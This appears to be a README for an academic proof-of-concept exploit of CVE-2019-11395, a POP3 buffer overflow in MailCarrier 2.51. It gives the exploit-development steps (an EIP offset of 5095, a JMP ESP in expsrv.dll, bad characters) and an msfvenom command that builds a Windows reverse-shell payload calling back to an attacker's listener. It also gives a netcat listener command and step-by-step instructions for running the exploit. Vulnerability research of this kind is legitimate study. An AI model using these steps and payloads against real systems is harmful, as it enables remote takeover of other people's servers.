The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.
During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes it to stop functioning, thus revealing the buffer overflow vulnerability.
- Utilized
msf-pattern_create -l 6000
to accurately identify the EIP. - Identified the EIP offset with
msf-pattern_offset -q 6E47386E -l 6000
, resulting in an EIP offset of 5095. - Identified
expsrv.dll
with ASLR disabled, suitable for a JMP ESP. - Identified bad characters
\x00\x0a\x0d
during tests for invalid characters. - Generated payload with
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode
. - Adjusted the
CVE-2019-11395.py
code to accommodate the payload. - Opened connection with
nc -lnvp 4444
and executed the exploit (CVE-2019-11395.py
) to gain access to the environment and validate the described CVE.
Follow these steps to utilize the exploit:
- Generate the payload using
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode
. - Copy the output of the
msfvenom
command. - Adjust the
CVE-2019-11395.py
code to replace theshellcode
variable with the output obtained from themsfvenom
command. - Execute the exploit (
CVE-2019-11395.py
) to gain access to the environment and validate the described CVE.
Visit my profile on LinkedIn